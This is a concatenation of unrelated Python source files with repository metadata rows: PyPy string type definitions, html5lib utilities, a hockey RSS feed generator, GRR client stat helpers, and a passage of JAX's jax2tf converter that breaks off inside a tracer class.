' of S where all tab characters are expanded using'
' spaces.\nIf tabsize is not given, a tab size of 8'
' characters is assumed.')
str_splitlines = SMM('splitlines', 2, defaults=(0,),
doc='S.splitlines([keepends]) -> list of'
' strings\n\nReturn a list of the lines in S,'
' breaking at line boundaries.\nLine breaks are not'
' included in the resulting list unless keepends\nis'
' given and true.')
str_startswith = SMM('startswith', 4, defaults=(0, maxint),
doc='S.startswith(prefix[, start[, end]]) ->'
' bool\n\nReturn True if S starts with the specified'
' prefix, False otherwise.\nWith optional start, test'
' S beginning at that position.\nWith optional end,'
' stop comparing S at that position.')
str_translate = SMM('translate', 3, defaults=('',), #unicode mimic not supported now
doc='S.translate(table [,deletechars]) -> string\n\n'
'Return a copy of the string S, where all characters'
' occurring\nin the optional argument deletechars are'
' removed, and the\nremaining characters have been'
' mapped through the given\ntranslation table, which'
' must be a string of length 256.')
str_decode = SMM('decode', 3, defaults=(None, None),
doc='S.decode([encoding[,errors]]) -> object\n\nDecodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeDecodeError. Other possible values'
" are 'ignore' and 'replace'\nas well as any other"
' name registerd with codecs.register_error that'
' is\nable to handle UnicodeDecodeErrors.')
str_encode = SMM('encode', 3, defaults=(None, None),
doc='S.encode([encoding[,errors]]) -> object\n\nEncodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeEncodeError. Other possible values'
" are 'ignore', 'replace' and\n'xmlcharrefreplace' as"
' well as any other name registered'
' with\ncodecs.register_error that is able to handle'
' UnicodeEncodeErrors.')
# ____________________________________________________________
def descr__new__(space, w_stringtype, w_object=''):
# NB. the default value of w_object is really a *wrapped* empty string:
# there is gateway magic at work
from pypy.objspace.std.stringobject import W_StringObject
w_obj = space.str(w_object)
if space.is_w(w_stringtype, space.w_str):
return w_obj # XXX might be reworked when space.str() typechecks
value = space.str_w(w_obj)
if space.config.objspace.std.withrope:
from pypy.objspace.std.ropeobject import rope, W_RopeObject
w_obj = space.allocate_instance(W_RopeObject, w_stringtype)
W_RopeObject.__init__(w_obj, rope.LiteralStringNode(value))
return w_obj
else:
w_obj = space.allocate_instance(W_StringObject, w_stringtype)
W_StringObject.__init__(w_obj, value)
return w_obj
# ____________________________________________________________
str_typedef = StdTypeDef("str", basestring_typedef,
__new__ = newmethod(descr__new__),
__doc__ = '''str(object) -> string
Return a nice string representation of the object.
If the argument is a string, the return value is the same object.'''
)
str_typedef.custom_hash = True
str_typedef.registermethods(globals())
# ____________________________________________________________
# Helpers for several string implementations
@specialize.argtype(0)
def stringendswith(u_self, suffix, start, end):
begin = end - len(suffix)
if begin < start:
return False
for i in range(len(suffix)):
if u_self[begin+i] != suffix[i]:
return False
return True
@specialize.argtype(0)
def stringstartswith(u_self, prefix, start, end):
stop = start + len(prefix)
if stop > end:
return False
for i in range(len(prefix)):
if u_self[start+i] != prefix[i]:
return False
return True
| 55.287009 | 87 | 0.549727 | [
"MIT"
] | woodrow/pyoac | pypy/objspace/std/stringtype.py | 18,300 | Python |
from __future__ import absolute_import
from types import ModuleType
class MethodDispatcher(dict):
u"""Dict with 2 special properties:
On initiation, keys that are lists, sets or tuples are converted to
multiple keys so accessing any one of the items in the original
list-like object returns the matching value
md = MethodDispatcher({("foo", "bar"):"baz"})
md["foo"] == "baz"
A default value which can be set through the default attribute.
"""
def __init__(self, items=()):
# Using _dictEntries instead of directly assigning to self is about
# twice as fast. Please do careful performance testing before changing
# anything here.
_dictEntries = []
for name,value in items:
if type(name) in (list, tuple, frozenset, set):
for item in name:
_dictEntries.append((item, value))
else:
_dictEntries.append((name, value))
dict.__init__(self, _dictEntries)
self.default = None
__init__.func_annotations = {}
def __getitem__(self, key):
return dict.get(self, key, self.default)
__getitem__.func_annotations = {}
#Some utility functions to dal with weirdness around UCS2 vs UCS4
#python builds
def encodingType():
if len() == 2:
return u"UCS2"
else:
return u"UCS4"
encodingType.func_annotations = {}
def isSurrogatePair(data):
return (len(data) == 2 and
ord(data[0]) >= 0xD800 and ord(data[0]) <= 0xDBFF and
ord(data[1]) >= 0xDC00 and ord(data[1]) <= 0xDFFF)
isSurrogatePair.func_annotations = {}
def surrogatePairToCodepoint(data):
char_val = (0x10000 + (ord(data[0]) - 0xD800) * 0x400 +
(ord(data[1]) - 0xDC00))
return char_val
surrogatePairToCodepoint.func_annotations = {}
# Module Factory Factory (no, this isn't Java, I know)
# Here to stop this being duplicated all over the place.
def moduleFactoryFactory(factory):
moduleCache = {}
def moduleFactory(baseModule, *args, **kwargs):
if type(ModuleType.__name__) is unicode:
name = u"_%s_factory" % baseModule.__name__
else:
name = "_%s_factory" % baseModule.__name__
if name in moduleCache:
return moduleCache[name]
else:
mod = ModuleType(name)
objs = factory(baseModule, *args, **kwargs)
mod.__dict__.update(objs)
moduleCache[name] = mod
return mod
moduleFactory.func_annotations = {}
return moduleFactory
moduleFactoryFactory.func_annotations = {}
| 31.650602 | 78 | 0.633422 | [
"MIT"
] | gsnedders/html5lib | python/html5lib/utils.py | 2,627 | Python |
import os
__author__ = "Aaron Koeppel"
__version__ = 1.0
def xmlMarkup(games, team_ab, team_name, team_record):
'''Markup the RSS feed using the data obtained.
:param games: list of games that the team played this season
:type games: list of GameData
:param team_ab: the team's abbreviated name
:type team_ab: string
:param team_name: the team's name
:type team_name: string'''
file_name = team_ab + "_feed.xml"
'''Used code from http://stackoverflow.com/questions/7935972/
writing-to-a-new-directory-in-python-without-changing-directory'''
script_dir = os.path.dirname(os.path.abspath(__file__))
dest_dir = os.path.join(script_dir, "feeds", team_ab)
try:
os.makedirs(dest_dir)
except OSError:
pass
path = os.path.join(dest_dir, file_name)
with open(path, 'w') as xml:
xml.write('<?xml version="1.0" encoding="UTF-8" ?>\n')
xml.write("<rss version='2.0'>\n")
xml.write("<channel>\n")
xml.write("<title>%s - %s</title>\n" % (team_name, team_record))
xml.write("<description>Latest %s scores</description>\n" % team_name)
xml.write("<link>http://espn.go.com/nhl/team/schedule/_/name/%s</link>\n"
% team_ab)
for game in games:
xml.write("<item>\n")
xml.write("<title>%s</title>\n" % game.headline)
xml.write("<link>%s</link>\n" % game.link)
xml.write("</item>\n")
xml.write("</channel>\n</rss>")
xml.close() | 32.521739 | 79 | 0.625 | [
"MIT"
] | ak212/python-hockey-rss | markup.py | 1,496 | Python |
#!/usr/bin/env python
"""Client utilities."""
import logging
import sys
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
# pylint: disable=g-import-not-at-top
if sys.platform == "win32":
from grr_response_client import client_utils_windows as _client_utils
elif sys.platform == "darwin":
from grr_response_client import client_utils_osx as _client_utils
else:
from grr_response_client import client_utils_linux as _client_utils
# pylint: enable=g-import-not-at-top
# pylint: disable=g-bad-name
CanonicalPathToLocalPath = _client_utils.CanonicalPathToLocalPath
FindProxies = _client_utils.FindProxies
GetExtAttrs = _client_utils.GetExtAttrs
GetRawDevice = _client_utils.GetRawDevice
KeepAlive = _client_utils.KeepAlive
LocalPathToCanonicalPath = _client_utils.LocalPathToCanonicalPath
MemoryRegions = _client_utils.MemoryRegions
NannyController = _client_utils.NannyController
OpenProcessForMemoryAccess = _client_utils.OpenProcessForMemoryAccess
TransactionLog = _client_utils.TransactionLog
VerifyFileOwner = _client_utils.VerifyFileOwner
# pylint: enable=g-bad-name
def StatEntryFromPath(path, pathspec, ext_attrs=True):
"""Builds a stat entry object from a given path.
Args:
path: A path (string value) to stat.
pathspec: A `PathSpec` corresponding to the `path`.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
try:
stat = utils.Stat(path)
except (IOError, OSError) as error:
logging.error("Failed to obtain stat for '%s': %s", pathspec, error)
return rdf_client_fs.StatEntry(pathspec=pathspec)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
def StatEntryFromStat(stat, pathspec, ext_attrs=True):
"""Build a stat entry object from a given stat object.
Args:
stat: A `Stat` object.
pathspec: A `PathSpec` from which `stat` was obtained.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
result = rdf_client_fs.StatEntry(pathspec=pathspec)
for attr in _STAT_ATTRS:
value = getattr(stat.GetRaw(), attr, None)
if value is None:
continue
# TODO(hanuszczak): Why are we doing this?
value = int(value)
if value < 0:
value &= 0xFFFFFFFF
setattr(result, attr, value)
result.st_flags_linux = stat.GetLinuxFlags()
result.st_flags_osx = stat.GetOsxFlags()
if ext_attrs:
# TODO(hanuszczak): Can we somehow incorporate extended attribute getter to
# the `Stat` class? That would make the code a lot prettier but would force
# `utils` to depend on `xattrs`.
result.ext_attrs = list(GetExtAttrs(stat.GetPath()))
return result
def StatEntryFromStatPathSpec(stat, ext_attrs):
pathspec = rdf_paths.PathSpec(
pathtype=rdf_paths.PathSpec.PathType.OS,
path=LocalPathToCanonicalPath(stat.GetPath()),
path_options=rdf_paths.PathSpec.Options.CASE_LITERAL)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
_STAT_ATTRS = [
"st_mode",
"st_ino",
"st_dev",
"st_nlink",
"st_uid",
"st_gid",
"st_size",
"st_atime",
"st_mtime",
"st_ctime",
"st_blocks",
"st_blksize",
"st_rdev",
]
| 29.078261 | 79 | 0.746112 | [
"Apache-2.0"
] | billstackpole/grr | grr/client/grr_response_client/client_utils.py | 3,344 | Python |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental module transforms JAX functions to be executed by TensorFlow."""
import functools
import re
import string
from typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import jax
from jax import ad_util, api_util, config
from jax._src import api
from jax import core, custom_derivatives, dtypes
from jax import linear_util as lu
from jax import numpy as jnp
from jax import random, tree_util
from jax._src import util
from jax._src.lax import control_flow as lax_control_flow
from jax._src.lax import fft as lax_fft
from jax._src.lax import lax
from jax._src.lax import linalg as lax_linalg
import jax._src.random
from jax.api_util import flatten_fun
from jax.interpreters import ad
from jax.interpreters import pxla
from jax.interpreters import sharded_jit
from jax.interpreters import xla
from jax.lib import xla_client
from . import shape_poly
import numpy as np
import tensorflow as tf # type: ignore[import]
# These don't have public equivalents.
# pylint: disable=g-direct-tensorflow-import
from tensorflow.compiler.tf2xla.python import xla as tfxla # type: ignore[import]
from tensorflow.compiler.xla import xla_data_pb2 # type: ignore[import]
from tensorflow.compiler.xla.experimental.xla_sharding import xla_sharding # type: ignore[import]
# pylint: enable=g-direct-tensorflow-import
PolyShape = shape_poly.PolyShape
# The scope name need to be a valid TensorFlow name. See
# https://github.com/tensorflow/tensorflow/blob/r2.3/tensorflow/core/framework/node_def_util.cc#L731
_VALID_SCOPE_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\/>-]*$")
_INVALID_SCOPE_CHAR = re.compile("[^A-Za-z0-9_.\\/>-]")
def _sanitize_scope_name(name):
scope_name = _INVALID_SCOPE_CHAR.sub("_", name)
if not _VALID_SCOPE_REGEX.match(scope_name):
scope_name = ".{}".format(scope_name)
return scope_name
# A value suitable in a TF tracing context: tf.Tensor, tf.Variable,
# or Python scalar or numpy.ndarray. (A tf.EagerTensor is a tf.Tensor.)
TfVal = Any
DType = Any
PrecisionType = int # Enum xla_data.PrecisionConfig.Precision
def _is_tfval(v: TfVal) -> bool:
if isinstance(v, (tf.Tensor, tf.Variable)):
return True
try:
# Note: this conversion is overkill and just intended as a type check; this
# code is in principle only run if config.jax_enable_checks is True.
# TODO: it is not true that this code is run only with jax_enable_checks.
_safe_convert_to_tensor(v)
return True
except ValueError:
return False
def _safe_convert_to_tensor(val, dtype=None) -> TfVal:
dtype = dtype if dtype else (val.dtype if hasattr(val, "dtype") else None)
conversion_type = to_tf_dtype(dtype) if dtype else None
# The float0 type is not known to TF.
if dtype and dtype == dtypes.float0:
val = np.zeros(np.shape(val), conversion_type.as_numpy_dtype)
return tf.convert_to_tensor(val, dtype=conversion_type)
# The implementation rules for primitives. The rule will be called with the
# arguments (TfVal) and must return TfVal (or a sequence thereof,
# if primitive.multiple_results). The vast majority of primitives do not need
# to worry about core.unit inputs or results. The exception are primarily the
# control-flow primitives.
tf_impl: Dict[core.Primitive, Callable[..., Any]] = {}
# Some primitive implementation rules need the abstract values of arguments
# and the results. This is the case for the primitives implemented using
# _convert_jax_impl and those that need to adjust the shape of the outputs
# due to missing TF shape inference rules for TFXLA ops. The rules for these
# primitives should be added to `tf_impl_with_avals`.
# The abstract value are passed to the implementation as two special kwargs
# `_in_avals` (a tuple of core.AbstractValue) and `_out_aval` (a
# core.AbstractValue, or a tuple thereof when primitive.multiple_results).
tf_impl_with_avals: Dict[core.Primitive, Callable[..., Any]] = {}
# XLA is not linked in all environments; when converting a primitive, if this
# variable is disabled, we try harder to use only standard TF ops if they are
# applicable to the concrete use case; if the resulting conversion path ends up
# requiring a TFXLA operation, an exception is thrown instead.
_enable_xla = True
def _xla_disabled_error(primitive_name: str,
extra_msg: Optional[str] = None) -> Exception:
assert not _enable_xla
msg = f"Call to {primitive_name} cannot be converted with enable_xla=False."
if extra_msg:
msg += f" {extra_msg}"
return NotImplementedError(msg)
@functools.partial(api_util.api_hook, tag="jax2tf_convert")
def convert(fun: Callable,
*,
polymorphic_shapes: Optional[Sequence[Any]] = None,
with_gradient=True,
enable_xla=True) -> Callable:
"""Transforms `fun` to be executed by TensorFlow.
See
[README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md)
for more details about usage and common problems.
Args:
fun: Function to be transformed. Its arguments and return value should be
JAX arrays, or nested standard Python containers (tuple/list/dict) thereof
(pytrees).
polymorphic_shapes: Specifies input shapes to be treated polymorphically
during conversion.
.. warning:: The shape-polymorphic conversion is an experimental feature.
It is meant to be sound, but it is known to reject some JAX programs
that are shape polymorphic. The details of this feature can change. It
should be a Python object with the same pytree structure as, or a prefix
of, the tuple of arguments to the function, but with a shape
specification corresponding to each argument. The default value is
`None`, which is a shortcut for a tuple of `None` one for each argument,
denoting that all shapes are monomorphic.
See [how optional parameters are matched to
arguments](https://jax.readthedocs.io/en/latest/pytrees.html#applying-optional-parameters-to-pytrees).
A shape specification for an array argument should be an object
`PolyShape(dim0, dim1, ..., dimn)`
where each `dim` is a dimension specification: a positive integer denoting
a monomorphic dimension of the given size, or a string denoting a
dimension variable assumed to range over non-zero dimension sizes, or
the special placeholder string "_" denoting a monomorphic dimension
whose size is given by the actual argument. As a shortcut, an Ellipsis
suffix in the list of dimension specifications stands for a list of "_"
placeholders. For convenience, a shape specification can also be given
as a string
representation, e.g.: "batch, ...", "batch, height, width, _", possibly
with surrounding parentheses: "(batch, ...)".
The conversion fails if it cannot ensure that the it would produce the same
sequence of TF ops for any non-zero values of the dimension variables.
polymorphic_shapes are only supported for positional arguments; shape
polymorphism is not supported for keyword arguments.
See [the README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md#shape-polymorphic-conversion)
for more details.
in_shapes: DEPRECATED in favor of `polymorphic_shapes`.
with_gradient: if set, will add a tf.custom_gradient to the converted
function, by converting the ``jax.vjp(fun)``. Only first-order
differentiation is supported for now. If the converted function is saved
in a SavedModel, the custom gradients are currently lost and an error will
be raised if a gradient computation is attempted. This is due to a current
bug in TensorFlow.
enable_xla: if unset, the converter will try harder to use pure TF ops to
convert the function, and raise an error if it can not be converted
without resorting to XLA ops (default: True).
Returns:
A version of `fun` that expects TfVals as arguments (or
tuple/lists/dicts) thereof, and returns TfVals as outputs.
"""
api._check_callable(fun)
def converted_fun(*args: TfVal, **kwargs: TfVal) -> TfVal:
# TODO: is there a better way to check if we are inside a transformation?
if not core.trace_state_clean():
raise ValueError("convert must be used outside all JAX transformations." +
f"Trace state: {core.thread_local_state.trace_state}")
def check_arg(a):
if not _is_tfval(a):
msg = (f"Argument {a} of type {type(a)} of jax2tf.convert(f) should "
"be NumPy array, scalar, tf.Variable, or tf.Tensor")
raise TypeError(msg)
tree_util.tree_map(check_arg, args)
tree_util.tree_map(check_arg, list(kwargs.values()))
# Name input tensors
args = tuple(
tree_util.tree_map(lambda x, i=i: tf.identity(x, f"jax2tf_arg_{i}"),
a) # type: ignore
for i, a in enumerate(args))
kwargs = {k: tf.identity(v, f"jax2tf_arg_{k}") for k, v in kwargs.items()}
# This function may take pytrees of TfVals. We can only set
# tf.custom_gradient on functions that take a flat argument list.
args_flat, in_tree = tree_util.tree_flatten((args, kwargs))
if polymorphic_shapes is None:
polymorphic_shapes_ = (None,) * len(args)
else:
if not isinstance(polymorphic_shapes, Sequence) or len(args) != len(polymorphic_shapes):
msg = ("polymorphic_shapes must be a sequence with the same length as the positional argument list "
f"({len(args)}). Got polymorphic_shapes={polymorphic_shapes}.")
raise TypeError(msg)
polymorphic_shapes_ = tuple(polymorphic_shapes)
# Expand the polymorphic_shapes to match the argument pytree
polymorphic_shapes_flat = tuple(api_util.flatten_axes("jax2tf.convert polymorphic_shapes",
in_tree.children()[0],
polymorphic_shapes_))
# Add kwargs shapes.
polymorphic_shapes_flat = polymorphic_shapes_flat + tuple(
(None,) * (len(args_flat) - len(polymorphic_shapes_flat)))
# Construct the abstract values for the flat arguments, possibly based on
# the input shapes and the polymorphic_shapes if given. May create new shape
# variables.
args_avals_flat, shapeenv = _args_to_avals_and_env(args_flat,
polymorphic_shapes_flat)
f = lu.wrap_init(fun)
# out_tree_thunk() will be the output tree, after running _interpret_fun.
flat_fun, out_tree_thunk = flatten_fun(f, in_tree)
# Prepare the grad_fn for tf.custom_gradient.
def converted_grad_fn(*out_cts_flat: TfVal,
_out_cts_avals: Sequence[core.AbstractValue],
variables=None):
if variables:
raise ValueError(
"Unexpected variables used in forward pass. "
"This should not happen for first-order differentiation. "
f"variables={variables}")
def fun_vjp_jax(args_jax, out_cts_jax):
# One may think that we can get the pullback while we are converting
# the main function in the first place. That is problematic, because the
# pullback may contain captured tracers from the conversion of the
# main function. Those tracers will confuse the conversion of the
# pullback. So, we construct the vjp anew.
_, pullback_jax = jax.vjp(fun, *args_jax)
return pullback_jax(out_cts_jax)
if polymorphic_shapes is None:
vjp_polymorphic_shapes = None
else:
args_polymorphic_shapes = tree_util.tree_unflatten(
in_tree.children()[0], polymorphic_shapes_flat)
out_cts_polymorphic_shapes = tree_util.tree_unflatten(
out_tree_thunk(),
tuple(str(out_aval.shape)
for out_aval in _out_cts_avals)) # type: ignore
vjp_polymorphic_shapes = [
args_polymorphic_shapes, out_cts_polymorphic_shapes
]
out_cts = tree_util.tree_unflatten(out_tree_thunk(), out_cts_flat)
# TODO: enable higher-order gradients
with tf.name_scope("jax2tf_vjp"):
in_cts = convert(
fun_vjp_jax,
with_gradient=False,
polymorphic_shapes=vjp_polymorphic_shapes)(args, out_cts)
return in_cts
try:
global _shape_env
assert not _shape_env, f"Unexpected shape environment {_shape_env}"
global _enable_xla
prev_enable_xla = _enable_xla
_enable_xla = enable_xla
_shape_env = shapeenv
if with_gradient:
@tf.custom_gradient
def converted_fun_flat_with_custom_gradient(*args_flat: TfVal) -> TfVal:
out_with_avals = _interpret_fun(flat_fun, args_flat, args_avals_flat)
outs, out_avals = util.unzip2(out_with_avals)
return (tuple(outs),
functools.partial(
converted_grad_fn, _out_cts_avals=tuple(out_avals)))
out_flat = converted_fun_flat_with_custom_gradient(*args_flat)
else:
out_flat_raw = _interpret_fun(flat_fun, args_flat, args_avals_flat)
message = ("The jax2tf-converted function does not support gradients. "
"Use `with_gradient` parameter to enable gradients")
# We use PreventGradient, which is propagated through a SavedModel.
out_flat = [
tf.raw_ops.PreventGradient(input=o, message=message)
for o, _ in out_flat_raw
]
finally:
_shape_env = {}
_enable_xla = prev_enable_xla
out_flat = [tf.identity(x, "jax2tf_out") for x in out_flat]
out = tree_util.tree_unflatten(out_tree_thunk(), out_flat)
return out
return converted_fun
# Internals
def _interpret_fun(
fun: lu.WrappedFun, in_vals: Sequence[TfVal],
in_avals: Sequence[core.AbstractValue]
) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
with core.new_base_main(TensorFlowTrace) as main: # type: ignore
fun = _interpret_subtrace(fun, main, in_avals)
with core.new_sublevel():
out_vals: Sequence[Tuple[TfVal, core.AbstractValue]] = \
fun.call_wrapped(*in_vals)
del main
return tuple(out_vals)
def _convert_jax_impl(jax_impl: Callable, *, multiple_results=True) -> Callable:
"""Convert the JAX implementation of a primitive.
Args:
jax_impl: typically the impl-rule for a primitive, with signature
`(*args: JaxVal, **kwargs) -> Sequence[JaxVal]`. This function implements
a primitive in terms of other primitives.
multiple_results: whether `jax_impl` returns a sequence of results.
Returns:
a function with signature `(*args: TfVal, _in_avals, _out_aval, **kwargs)
-> Sequence[TfVal]`.
"""
def wrapped(*tf_args: TfVal, _in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue, **kwargs) -> Sequence[TfVal]:
# We wrap the jax_impl under _interpret_fun to abstract the TF values
# from jax_impl and turn them into JAX abstract values.
def jax_impl_jax_args(*jax_args):
jax_results = jax_impl(*jax_args, **kwargs)
return jax_results if multiple_results else [jax_results]
tf_results_with_avals = _interpret_fun(
lu.wrap_init(jax_impl_jax_args), tf_args, _in_avals)
tf_results, _ = util.unzip2(tf_results_with_avals)
return tf_results if multiple_results else tf_results[0]
return wrapped
@lu.transformation
def _interpret_subtrace(main: core.MainTrace,
in_avals: Sequence[core.AbstractValue],
*in_vals: TfVal):
trace = TensorFlowTrace(main, core.cur_sublevel())
in_tracers = tuple(
TensorFlowTracer(trace, val, aval)
for val, aval in util.safe_zip(in_vals, in_avals))
# The outs may be core.unit, see comment in TensorFlowTrace.pure.
outs = yield in_tracers, {} # type: Sequence[Union[TfVal, core.Unit]]
out_tracers: Iterable[TensorFlowTracer] = (
map(trace.full_raise, outs)) # type: ignore
out_vals_with_avals: Sequence[Tuple[TfVal, core.AbstractValue]] = (
tuple((t.val, t.aval) for t in out_tracers))
yield out_vals_with_avals
def _interpret_jaxpr(jaxpr: core.ClosedJaxpr, *args: TfVal) -> Sequence[TfVal]:
"""Evaluates a Jaxpr with tf.Tensor arguments.
The output is a sequence of TfVal (no `core.unit`), suitable for use with TF.
"""
fun: lu.WrappedFun = lu.wrap_init(core.jaxpr_as_fun(jaxpr))
out_with_avals = _interpret_fun(fun, args, jaxpr.in_avals)
return tuple(v for v, _ in out_with_avals)
### tracer
def _aval_to_tf_shape(aval: core.AbstractValue) -> Tuple[Optional[int], ...]:
"""Generate a TF shape, possibly containing None for polymorphic dimensions."""
return tuple(
map(lambda d: None if isinstance(d, shape_poly.DimVar) else d,
aval.shape)) # type: ignore[attr-defined]
def _tfval_shape_dtype(val: TfVal) -> Tuple[Sequence[Optional[int]], DType]:
"""Called for constants that occur in the program, or for input values to the converted function.
The returned shape may have unknown components, but only when called for
inputs.
"""
if isinstance(val, (tf.Tensor, tf.Variable)):
# May be partially known
return tuple(val.shape), to_jax_dtype(val.dtype)
else: # Must be a numeric value
assert not config.jax_enable_checks or _is_tfval(val), f"Non TfVal: {val}"
raw_aval = xla.abstractify(val)
return raw_aval.shape, raw_aval.dtype # type: ignore[attr-defined]
# A dimension environment maps dimension variables to TF expressions that
# compute the value of the dimension. These expressions refer to the TF
# function arguments.
_ShapeEnv = Dict[shape_poly.DimVar, TfVal]
def _args_to_avals_and_env(args: Sequence[TfVal],
polymorphic_shapes: Sequence[Optional[Union[str, PolyShape]]]) -> \
Tuple[Sequence[core.AbstractValue], _ShapeEnv]:
"""Computes abstract values and a dimension environment for arguments.
Args:
args: the arguments, TF inputs.
polymorphic_shapes: the polymorphic specifications for the arguments.
Returns: a tuple of a sequence of abtract values corresponding to the
arguments and a dimension environment.
"""
shapeenv: _ShapeEnv = {}
def input_aval(arg: TfVal,
polymorphic_shape: Optional[str]) -> core.AbstractValue:
"""The abstract value for an input."""
raw_shape, dtype = _tfval_shape_dtype(arg)
aval_shape = shape_poly.parse_spec(polymorphic_shape, raw_shape)
for i, d in enumerate(aval_shape):
if type(d) is int:
assert d == np.shape(arg)[i]
elif type(d) is shape_poly.DimVar and d not in shapeenv:
# Even if the shape of `arg` is known, we still use `tf.shape` for
# safety, because the promise is that we will convert the function
# to work for any value of the dimension.
shapeenv[d] = tf.shape(arg)[i] # type: ignore[index]
else:
# TODO: add an assertion tf.shape(arg)[i] == env[d]
pass
return core.ShapedArray(aval_shape, dtype)
avals = tuple(map(input_aval, args, polymorphic_shapes)) # type: ignore
return avals, shapeenv
# A shape environment maps shape variables to TfVal.
_shape_env = {} # type: _ShapeEnv
def _eval_shape(shape: Sequence[shape_poly.DimSize]) -> Sequence[TfVal]:
assert all(map(
lambda x: x is not None,
shape)), (f"Argument shape should be a valid JAX shape but got {shape}")
return tuple(_shape_env[d] # type: ignore[index]
if type(d) is shape_poly.DimVar else d
for d in shape)
def shape_as_value(x):
"""Injects the shape of `x` as an array value.
**Experimental: please give feedback, and expect changes!**
This allows the use of a shape expression as array argument to JAX functions.
A typical example is for implementing a mean operation:
jnp.sum(x) / np.prod(jax2tf.shape_as_value(x))
"""
# return shape_as_value_p.bind(x)
return NotImplementedError("shape_as_value is deprecated")
# # TODO: move this to masking or to some common library, if approved
# shape_as_value_p = core.Primitive("shape_as_value")
# shape_as_value_p.multiple_results = True
# def _shape_as_value_impl(x):
# x_shape = np.shape(x)
# def dim_to_int(dim: shape_poly.DimSize) -> int:
# dim_int = _poly_dim_to_tf_dim(dim)
# if dim_int is None:
# msg = ("shape_as_value is not implemented for non-constant shapes "
# "except for masking and jax2tf. "
# f"Has shape: {x_shape}")
# raise TypeError(msg)
# else:
# return dim_int
# return tuple(map(dim_to_int, x_shape))
#
# shape_as_value_p.def_impl(_shape_as_value_impl)
#
# def _shape_as_value_abstract(x_aval: core.AbstractValue) -> Sequence[core.AbstractValue]:
# rank = len(x_aval.shape) # type: ignore[attr-defined]
# return (core.ShapedArray((), dtypes.canonicalize_dtype(np.int_), weak_type=True),) * rank
#
# shape_as_value_p.def_abstract_eval(_shape_as_value_abstract)
#
# def _shape_as_value_translation(comp, x):
# return xla_client._xla.ops.Tuple(comp,
# tuple(xb.constant(comp, d)
# for d in comp.GetShape(x).dimensions()))
#
# xla.translations[shape_as_value_p] = _shape_as_value_translation
#
# def _shape_as_value_jvp_rule(primals, tangents):
# # The shape does not depend on the contents of the input
# x, = primals
# zero = ad.Zero.from_value(0.)
# return shape_as_value(x), (zero,) * len(x.shape)
#
# ad.primitive_jvps[shape_as_value_p] = _shape_as_value_jvp_rule
#
# def _shape_as_value__batching_rule(batched_args, batch_dims):
# xv, = batched_args
# batch_dim, = batch_dims
# batch_size = xv.shape[batch_dim]
# batched_shape = shape_as_value(xv)
# one_shape = batched_shape[0:batch_dim] + batched_shape[batch_dim+1:]
# res = tuple(jnp.broadcast_to(d, (batch_size, 1)) for d in one_shape)
# return res, (0,) * len(one_shape)
#
# batching.primitive_batchers[shape_as_value_p] = _shape_as_value__batching_rule
#
# def _shape_as_value_masking_rule(operands, operands_logical_shapes):
# x_logical_shape, = operands_logical_shapes
# return tuple(x_logical_shape)
#
# masking.masking_rules[shape_as_value_p] = _shape_as_value_masking_rule
#
# def _shape_as_value_tf(x: TfVal,
# _in_avals: Sequence[core.AbstractValue],
# _out_aval: core.AbstractValue) -> TfVal:
# x_aval = _in_avals[0]
# def dim_to_tfval(dim: shape_poly.DimSize, dim_idx: int) -> TfVal:
# dim_int = _poly_dim_to_tf_dim(dim)
# if dim_int is not None:
# return tf.convert_to_tensor(dim_int)
# else:
# return tf.shape(x)[dim_idx]
# return tuple(dim_to_tfval(dim, dim_idx)
# for dim_idx, dim in enumerate(x_aval.shape)) # type: ignore[attr-defined]
#
# tf_impl_with_avals[shape_as_value_p] = _shape_as_value_tf
# TODO(b/26854495): pylint doesn't understand slots and inheritance.
# pylint: disable=assigning-non-slot
class TensorFlowTracer(core.Tracer):
"""Tracer class that boxes a TF value and a JAX abstract value.
In addition to the TF value we carry the JAX abstract value because there are
two cases when it cannot be recovered from the value: (a) when the abstract
value is core.abstract_unit, in which case the value is tf.nan; (b) when we
are converting with polymorphic shapes, in which case the shape of the value
may have dimensions set to `None`, which the JAX abstract value may contain
more precise information.
When the value has a partially-known shape, the dimensions marked as `None`
must correspond to non-constant dimensions in the abstract value.
See README.md for details.
"""
# val: TfVal
# _aval: core.AbstractValue
__slots__ = ["val", "_aval"]
def __init__(self, trace: "TensorFlowTrace", val: TfVal,
aval: core.AbstractValue):
self._trace = trace
self._aval = aval
if aval is core.abstract_unit:
self.val = val
elif isinstance(val, (tf.Tensor, tf.Variable)):
val_shape, val_dtype = _tfval_shape_dtype(val)
aval_dtype = np.dtype(self._aval.dtype) # type: ignore[attr-defined]
if (val_dtype != aval_dtype and not config.x64_enabled and
(val_dtype == tf.int32 and aval_dtype == jnp.int64 or
val_dtype == tf.int64 and aval_dtype == jnp.int32 or
val_dtype == tf.float32 and aval_dtype == jnp.float64 or
val_dtype == tf.float64 and aval_dtype == jnp.float32 or
val_dtype == tf.complex128 and aval_dtype == jnp.complex64)):
# If JAX does not have x64 bit mode enabled, it will force the 64-bit
# values to use 32-bit precision. In order to make the TF conversion
# follow JAX's rules, we cast the TF values down to 32-bit mode.
val = tf.cast(val, dtype=aval_dtype)
